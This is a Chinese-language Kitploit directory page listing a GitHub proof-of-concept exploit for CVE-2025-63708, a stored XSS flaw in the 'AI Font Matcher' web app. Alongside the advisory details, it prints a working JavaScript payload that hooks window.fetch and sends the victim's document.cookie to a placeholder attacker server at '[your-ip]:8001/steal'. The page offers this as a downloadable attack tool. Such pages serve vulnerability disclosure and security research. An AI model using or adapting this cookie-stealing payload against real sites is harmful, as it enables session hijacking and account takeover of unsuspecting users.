Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-63708 — CVE-2025-63708 的概念验证漏洞利用程序,AI Font Matcher 中的一个存储型 XSS 漏洞。演示了通过 webfonts 获取响应中未经过滤的字体族名称进行的会话 Cookie 窃取。 | Kitploit
工具/GitHubGitHub/dylandavis1/cve-2025-63708
漏洞分析漏洞利用Web应用程序漏洞利用信息收集Web安全渗透测试
GitHubdylandavis1/cve-2025-63708

CVE-2025-63708

CVE-2025-63708 的概念验证漏洞利用程序,AI Font Matcher 中的一个存储型 XSS 漏洞。演示了通过 webfonts 获取响应中未经过滤的字体族名称进行的会话 Cookie 窃取。

查看仓库
8个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-63708

CVE ID: CVE-2025-63708
分配日期: 2025-12-11 问题类型: CWE-79(跨站脚本)
受影响产品: “AI Font Matcher”(发布于2025-10-10,nid=18425)
产品页面: https://www.sourcecodester.com/javascript/18425/ai-font-matcher-using-html-css-and-javascript-source-code.html
发现日期: 2025-10-11
研究人员: Dylan Davis

概要

该应用程序在处理来自 webfonts 请求的数据时,未对字体家族名称进行清理。攻击者若控制或拦截该响应,可注入 JavaScript 并在页面上下文中执行,从而导致会话 cookie 被盗和账户接管。

影响

  • 在受害者浏览器中执行任意 JavaScript
  • 泄露会话 cookie(测试期间观察到非 HttpOnly 的 cookie)
  • 账户劫持并代替用户执行操作

受影响版本/范围

  • 截至2025-10-10在 SourceCodester 上分发的 “AI Font Matcher” 包。

复现步骤 (PoC)

该 PoC 通过挂钩 window.fetch 并返回受控的 Web 字体负载,展示代码执行能力。

  1. 从下载的源码本地运行该应用。
  2. 打开开发者工具 → 控制台,粘贴以下 PoC(或加载 poc.js)。
  3. 触发获取 webfonts 的 UI;观察 alert(1) 弹出。
root@kitploit:~
window.__origFetch = window.fetch;
window.fetch = async function(input, init) {
    const url = (typeof input === 'string') ? input : input?.url;
    if (url && url.includes('webfonts')) {
        // 将 cookie 发送到你的服务器进行泄露
        fetch('http://[your-ip]:8001/steal?cookie=' + 
              encodeURIComponent(document.cookie))
            .catch(e => console.log('Exfil failed:', e));
        
        return new Response(JSON.stringify({
            kind: "webfonts#webfontList",
            items: [{ family: "Playfair Display", category: "serif" }]
        }), {
            status: 200, 
            headers: {'Content-Type': 'application/json'}
        });
    }
    return window.__origFetch.apply(this, arguments);
};
下载工具